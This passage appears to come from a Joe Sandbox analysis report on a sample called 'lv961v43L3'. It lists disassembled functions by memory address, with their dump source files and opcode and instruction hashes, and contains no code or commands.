                                                                  • Opcode Fuzzy Hash: 48b35388ecdda137f0316f01806e13329bf67d39bdf2681f50bfc4b02232fe87
                                                                  • Instruction Fuzzy Hash: F981AC3090DB968FEBA9EF18C1D5671B7A1FF44341B50457DD0AE87A92CB2DB842CB81
                                                                  Function 00007FF8492E897B Relevance: .2, Instructions: 220COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fa9ed8cab50f5fd78f902f149b9f89a253a3e0d5687c8e40986b0739b2f411e4
                                                                  • Instruction ID: 8fe005344dd04a74ed5f2d9b7e97a55d72f4fbab703707da3549ddc3c6272258
                                                                  • Opcode Fuzzy Hash: fa9ed8cab50f5fd78f902f149b9f89a253a3e0d5687c8e40986b0739b2f411e4
                                                                  • Instruction Fuzzy Hash: FC71C130D1D69A8FFBA5EF6888956BCBBB1EF05380F1405B9D05ED7282EE2C6841C711
                                                                  Function 00007FF8496964D1 Relevance: .2, Instructions: 220COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfa33936f13eed1b26e03b8ed41c129c92e6c8b39275ae506aad0d2164325ae6
                                                                  • Instruction ID: 61c4a574d962ae019f1166044015be75252a3e431b85360c7fb5947c1be36ece
                                                                  • Opcode Fuzzy Hash: cfa33936f13eed1b26e03b8ed41c129c92e6c8b39275ae506aad0d2164325ae6
                                                                  • Instruction Fuzzy Hash: 6A81BD3090CB868FE3B8EF14D594671B7E1FF44358B60457EC48A87A96CB29B842CB81
                                                                  Function 00007FF849692412 Relevance: .2, Instructions: 216COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc1b598a4c964410fd569f7b893cb3191f5b7ae58da461ff4eb40b9d2d2c4627
                                                                  • Instruction ID: ae96b16285a0b766ab3d7763963fa234eee2d58f518fa5c03ddd8e945aafb147
                                                                  • Opcode Fuzzy Hash: dc1b598a4c964410fd569f7b893cb3191f5b7ae58da461ff4eb40b9d2d2c4627
                                                                  • Instruction Fuzzy Hash: AA61047190C4C94FE7F8FF18D8666B977D0FF58354B1402B9D09ECB5AADE18A8068741
                                                                  Function 00007FF84969CB22 Relevance: .2, Instructions: 206COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab2558bd635fb58fef8df0246fbe32e2eca0f8e21835829a7ef446f940f7c2f6
                                                                  • Instruction ID: 5fedcca1ad46845916a642a03aca5b70d74c74cf1418c695ab08750ef1e5104f
                                                                  • Opcode Fuzzy Hash: ab2558bd635fb58fef8df0246fbe32e2eca0f8e21835829a7ef446f940f7c2f6
                                                                  • Instruction Fuzzy Hash: 1351E8B190C8C98FE7F8FE1898565B97BD0FF48354B1402BAD49FC7592DE1CA8068781
                                                                  Function 00007FF849694D42 Relevance: .2, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a71f5c41503a5aa55a5b04739c79d22a6234cba568894be2610ef49fda32afda
                                                                  • Instruction ID: ff3f77d07af157c9b95b2503f35c82ffd5a836cb32ba010e4cdf5badc351823b
                                                                  • Opcode Fuzzy Hash: a71f5c41503a5aa55a5b04739c79d22a6234cba568894be2610ef49fda32afda
                                                                  • Instruction Fuzzy Hash: 03616C30A189979FE798EF19D0956A5B791FF98388F508139D40EC3B86DF38F8518B84
                                                                  Function 00007FF8492E1212 Relevance: .2, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d0ba8ac9c31c57fa23cc936f3beb176e56d4786837b5aee08906390d39dc4dff
                                                                  • Instruction ID: a4f49727a39d1e43fbbe83e52697f86e128617f664dfb3a512db2cff026fe11a
                                                                  • Opcode Fuzzy Hash: d0ba8ac9c31c57fa23cc936f3beb176e56d4786837b5aee08906390d39dc4dff
                                                                  • Instruction Fuzzy Hash: EF616C70A1C9569FEB58EF58C091AB5B7A1FF58340F548239D01EC7B86DF38B8518B84
                                                                  Function 00007FF84969A402 Relevance: .2, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79329a6437aea9139ca09eee9efb35c42d70d1b390b11fc74c430a927e9e4659
                                                                  • Instruction ID: 8a82dc7400c72e9d2ade90faeec692a274d34e512af84cd165d1313ff5ae471c
                                                                  • Opcode Fuzzy Hash: 79329a6437aea9139ca09eee9efb35c42d70d1b390b11fc74c430a927e9e4659
                                                                  • Instruction Fuzzy Hash: 0B518D70A1C9869FE798EF18C1957B5B7D1FF58348F50823DC00EC7A86CB38A8518B84
                                                                  Function 00007FF849691FF5 Relevance: .2, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4de1400a268bd31bf40de95ee6fdcfd45bf760aae0cbffd42322c6eea416a76b
                                                                  • Instruction ID: 0397effe521d739b36b65e542cf3693c99f91a88efc5761e02307855fcaea623
                                                                  • Opcode Fuzzy Hash: 4de1400a268bd31bf40de95ee6fdcfd45bf760aae0cbffd42322c6eea416a76b
                                                                  • Instruction Fuzzy Hash: 3751E732D1E5999FDB95FB68A8515E9BBB0FF013A8F0801B7D148CB183DE2C6441C795
                                                                  Function 00007FF8492EA10E Relevance: .1, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e01cb12d4f0871a624c8b4355c3122e577c016818cb654922268941039fd5c6d
                                                                  • Instruction ID: 29a1dd72e7eae174d99f695594217e550195d03b1914c8afe2fc0d83c7340092
                                                                  • Opcode Fuzzy Hash: e01cb12d4f0871a624c8b4355c3122e577c016818cb654922268941039fd5c6d
                                                                  • Instruction Fuzzy Hash: E741012160D3C24FEB279E6888A41A57FA0EF53260B2981FBD499CB5D3D71D6846C362
                                                                  Function 00007FF8492EB210 Relevance: .1, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8df2b7c174ca08505833c88c7ef16771c484e45f37dbd1ecf3b1bc67492ddf07
                                                                  • Instruction ID: fa3c6bf641f5c4f5daf3b73ca1b2587dc5c650d6e9a60fa6497cd98a61c6fbfe
                                                                  • Opcode Fuzzy Hash: 8df2b7c174ca08505833c88c7ef16771c484e45f37dbd1ecf3b1bc67492ddf07
                                                                  • Instruction Fuzzy Hash: AC412730D1C9AA4EFBB9EA1C88A47F877A1FF55301F1446FAC05DC7582CE2C69848B41
                                                                  Function 00007FF8492EA290 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7643f637f1ca297cb614c2904ed34098454d7ec8f26bf55dd8c0e64aa71e8650
                                                                  • Instruction ID: 9639644e22af9266893f5070c429160e8776ab86dbcce59406f4efdb185c4d7a
                                                                  • Opcode Fuzzy Hash: 7643f637f1ca297cb614c2904ed34098454d7ec8f26bf55dd8c0e64aa71e8650
                                                                  • Instruction Fuzzy Hash: 3041052190D3C25FEB63AF6888A04B57FF0EF53260B1445BBD09ACB5D3DA1CA846C361
                                                                  Function 00007FF848F208D0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a993a3d81496aa44b7e8f786381f11aeee6d75e717cbd8d712a40d51bc29903
                                                                  • Instruction ID: 78dcacf228dcffa6e2c09d9128684c2a6f110a35e1afe159fd4aaef4faee7de6
                                                                  • Opcode Fuzzy Hash: 4a993a3d81496aa44b7e8f786381f11aeee6d75e717cbd8d712a40d51bc29903
                                                                  • Instruction Fuzzy Hash: A4415A22A1E9655EE344B37C70892FE7790EF843A8F1805BBD04DCB1C7DE0C6841829C
                                                                  Function 00007FF8492EE55A Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8284641827db4f7c0faee75f44c3e6ba2617b4a12703f6f89e330e1563afee2b
                                                                  • Instruction ID: 75e0d017d46f2289df79df02a60aaa2b61178371342a94e0594a91b7a312f83c
                                                                  • Opcode Fuzzy Hash: 8284641827db4f7c0faee75f44c3e6ba2617b4a12703f6f89e330e1563afee2b
                                                                  • Instruction Fuzzy Hash: E641BD7190D6DA9FEBA2EF68D8A45EC7B70FF45344F1401BBC04DD7182DA2C68068761
                                                                  Function 00007FF8492E2FC7 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8cc7465045429a8e9b5ba6d47829b46d5bbe6d56f18b056f615b73c16bf2e27f
                                                                  • Instruction ID: 436db8f4e7365cb6f8376f2b969d91f9f3c8f4949ff2632c465fd55f26889eb6
                                                                  • Opcode Fuzzy Hash: 8cc7465045429a8e9b5ba6d47829b46d5bbe6d56f18b056f615b73c16bf2e27f
                                                                  • Instruction Fuzzy Hash: 25417331A0C9998FDF98EF28D495DA973E1FBA932170445AED04EC3182DE34E895CB91
                                                                  Function 00007FF849696AF7 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 284f7ea1e182a19935e6c35c211450b0620dfe878dfde3124b9520b959a99ff1
                                                                  • Instruction ID: 658c6fad368e76221bfeb68676d4814837f2d92a2773ea9ddb521c0c5ababcb3
                                                                  • Opcode Fuzzy Hash: 284f7ea1e182a19935e6c35c211450b0620dfe878dfde3124b9520b959a99ff1
                                                                  • Instruction Fuzzy Hash: AB41A23160CD599FDB99FF28C455DA5B3E1FBA9364B0401AAD00FC3296DE25E885CF81
                                                                  Function 00007FF8492EC4E7 Relevance: .1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1c26cac8fbd9f8cc16e2d9350f387360b3b0d64b5d433c37a513ceb74dc5cbc
                                                                  • Instruction ID: 6a7e6aa9f33cc2a1d31e913da95c537c8f43c274e0a13ad012dabbb8a67d2d29
                                                                  • Opcode Fuzzy Hash: d1c26cac8fbd9f8cc16e2d9350f387360b3b0d64b5d433c37a513ceb74dc5cbc
                                                                  • Instruction Fuzzy Hash: D0417731A0C9599FEF98FF5CC4959B973E1FFA9311B14026AD00ED7192CE28E845CB85
                                                                  Function 00007FF8492EC591 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10da6a23011eb804e607652e93ebf4bda67b686a65ddf74bfab6b43cb3b12e1b
                                                                  • Instruction ID: c8fee5d957de269fe542aefdb2748b0aed8bdb62a399958ab5d80fac4c07cb0f
                                                                  • Opcode Fuzzy Hash: 10da6a23011eb804e607652e93ebf4bda67b686a65ddf74bfab6b43cb3b12e1b
                                                                  • Instruction Fuzzy Hash: 8F317031A0C9559FDF99FF2CC495AA577E1FFA9311B0402AAD01EC7292CE28E845CB81
                                                                  Function 00007FF8492E3071 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 770b3e30c3aff55d35071065961e891d5c3432391d8566c2ecd12d3bfb91e66e
                                                                  • Instruction ID: afe071b7095b3e8fa27e2bc661f96ed975abb9ba5f5258bd94ed48a30daf8bf1
                                                                  • Opcode Fuzzy Hash: 770b3e30c3aff55d35071065961e891d5c3432391d8566c2ecd12d3bfb91e66e
                                                                  • Instruction Fuzzy Hash: C2319131A0C9988FDF98EF28C495EA573E1FBA931170405AED45EC7192DE24FC85CB91
                                                                  Function 00007FF849696BA1 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 088f3d01aa4bade53c1244772b328d1b281bb801873ea5f4ff9f82bed68148e0
                                                                  • Instruction ID: 331f078df6c084ff97a48cfb488596668099bf1599fe8f57f8c9d5f45ae7ba53
                                                                  • Opcode Fuzzy Hash: 088f3d01aa4bade53c1244772b328d1b281bb801873ea5f4ff9f82bed68148e0
                                                                  • Instruction Fuzzy Hash: 5531A031A0CD559FDB99FF28C455EA4B3E1FBA9354B0401AED40BC7296DE28E885CF81
                                                                  Function 00007FF8492E0856 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 379486495e83df2667e17a6a744b1cdf96443fe54a83df676535dd5bc06ffadd
                                                                  • Instruction ID: 61b1acf6f521c90537fbfe21567369572f973e7c1d6b89134c59f9e4dcbfb937
                                                                  • Opcode Fuzzy Hash: 379486495e83df2667e17a6a744b1cdf96443fe54a83df676535dd5bc06ffadd
                                                                  • Instruction Fuzzy Hash: 4D31182194D7954FF779AE2C989513A7BE4DF86390F24407EE0DEC3692D92C78038782
                                                                  Function 00007FF84969732A Relevance: .1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d4a7006f1f6260f6368616d765cae0ec804614ee4335ccef6994882391b26a78
                                                                  • Instruction ID: 392805a489dcb817f934caa2842f4f5e86669d860ed3608f7cac3e7f189d4d24
                                                                  • Opcode Fuzzy Hash: d4a7006f1f6260f6368616d765cae0ec804614ee4335ccef6994882391b26a78
                                                                  • Instruction Fuzzy Hash: F531D421B1EA854FEB98B62C98567B973C2EFD4354F54007DE40EC36C3DE1C79468159
                                                                  Function 00007FF8492EC52B Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e70ea33d111f96f5ced9d7c1a85e26789d54f8d7b1e875a41bee07245aec19ec
                                                                  • Instruction ID: 582e9f13edd86654a82689c5d417998fd502dfe8cd5cba399e3afc43c374cf2a
                                                                  • Opcode Fuzzy Hash: e70ea33d111f96f5ced9d7c1a85e26789d54f8d7b1e875a41bee07245aec19ec
                                                                  • Instruction Fuzzy Hash: FD31643160C9559FDF98FF2CC495AA573E1FFA9311B1402AAD00ED7592CE2CE845CB81
                                                                  Function 00007FF8492E300B Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7371dd35dbbdcf9eae471ab02380b70cccb352fce89575c3c4a6d3da168754db
                                                                  • Instruction ID: 2f92f0b1456b8cc2195ce623f3c1e77b68e59fa7cbe715db0366f0f522ab79c5
                                                                  • Opcode Fuzzy Hash: 7371dd35dbbdcf9eae471ab02380b70cccb352fce89575c3c4a6d3da168754db
                                                                  • Instruction Fuzzy Hash: BC31823160C9999FDF98EF28C495DA973E1FBA931170405ADD04EC7192DE38F885CB91
                                                                  Function 00007FF849695820 Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac39b725b804998ca8dc1ba732efcedcfa369b4de24838012ea73f17e2687c78
                                                                  • Instruction ID: 88bbe217ff79950ec48bcff57d290f372d2987113f74fd9e8eb44135234e701d
                                                                  • Opcode Fuzzy Hash: ac39b725b804998ca8dc1ba732efcedcfa369b4de24838012ea73f17e2687c78
                                                                  • Instruction Fuzzy Hash: AA312A30D2C8EA8EE7F8AE1844546B87BE2FB50344F1445BAD84EC7186CD2CA9858741
                                                                  Function 00007FF849696B3B Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f408254a0221a8e9110fe220e208ef28a9ba22ad8ce2dfbe297e90026615dc35
                                                                  • Instruction ID: 26d9cdf0225888dfe3f8254e7ef2ca303fd403b4a07349235aa245524d6edaad
                                                                  • Opcode Fuzzy Hash: f408254a0221a8e9110fe220e208ef28a9ba22ad8ce2dfbe297e90026615dc35
                                                                  • Instruction Fuzzy Hash: 5931913160CD599FDB99FF28C055DA5B3E1FB69754B0401AAD00BC7296DE28F885CF81
                                                                  Function 00007FF848F20998 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7c87dc52032acc8a1f72e4752ecbdb0b8a72fe7caa894e38bbbdaa0df33a9b6
                                                                  • Instruction ID: 588522717c64918e4c77226d0014f5af1a79609b16041949a9585ceeec29065c
                                                                  • Opcode Fuzzy Hash: c7c87dc52032acc8a1f72e4752ecbdb0b8a72fe7caa894e38bbbdaa0df33a9b6
                                                                  • Instruction Fuzzy Hash: 9231F521B1DD595FE788F72CA4596B932C2EB98351F2000BDE80DC33D7DE29AC818749
                                                                  Function 00007FF84969774C Relevance: .1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60ad9433216dd2f0a500b21a2a9b4f0cc861088f0fe00032462376f74f483b72
                                                                  • Instruction ID: 066c7d66831ab81bf8a727f569d0af765303923e14a5bcc43b5a706bd26a5955
                                                                  • Opcode Fuzzy Hash: 60ad9433216dd2f0a500b21a2a9b4f0cc861088f0fe00032462376f74f483b72
                                                                  • Instruction Fuzzy Hash: 8431BA30D4DA8A9FDBA9EF64D8515ED7BF0FF89354F1400BAD00ADB292DA2C6842C751
                                                                  Function 00007FF8492EE53F Relevance: .1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: acebe4790a3e58b6567c1fdff68314ad9f644dd4c564914e58b0a21b9879ac44
                                                                  • Instruction ID: a0bacf0e6a3e49a6f49680efd9178962959dcea5d659a9b2939bf40ac9311701
                                                                  • Opcode Fuzzy Hash: acebe4790a3e58b6567c1fdff68314ad9f644dd4c564914e58b0a21b9879ac44
                                                                  • Instruction Fuzzy Hash: 6F319C7190DAD99FEFA6EF68C8A45ACBBB0FF55340F1400ABD04DD7292DA286809C751
                                                                  Function 00007FF8492E012D Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8547e6b3caf7a319add883bd09f887aaa24891e5b7a6d0f0f4553f0e63695c5a
                                                                  • Instruction ID: 2c53d052f51a182decf7ebaf8554e3753050285c1585d12d856c65dadfba40fa
                                                                  • Opcode Fuzzy Hash: 8547e6b3caf7a319add883bd09f887aaa24891e5b7a6d0f0f4553f0e63695c5a
                                                                  • Instruction Fuzzy Hash: 17316B31E1C95A9FEB58EB5CD4919B8B7E2FF49350B10813AC05EC7682DF3478128B84
                                                                  Function 00007FF849693C8B Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfc874cd92f224fa7be9da613b4bc46725fb41ed22d6df811422b849906c925e
                                                                  • Instruction ID: a29daf7557237ae6c302184caaa92c3fcd246a2831e51de7b6910f87f5c36d32
                                                                  • Opcode Fuzzy Hash: dfc874cd92f224fa7be9da613b4bc46725fb41ed22d6df811422b849906c925e
                                                                  • Instruction Fuzzy Hash: 9C310B71E1C95A8FEBA8FE5CD4919B8F7A2FF58350B10513AD01EC3681DF24A852CB85
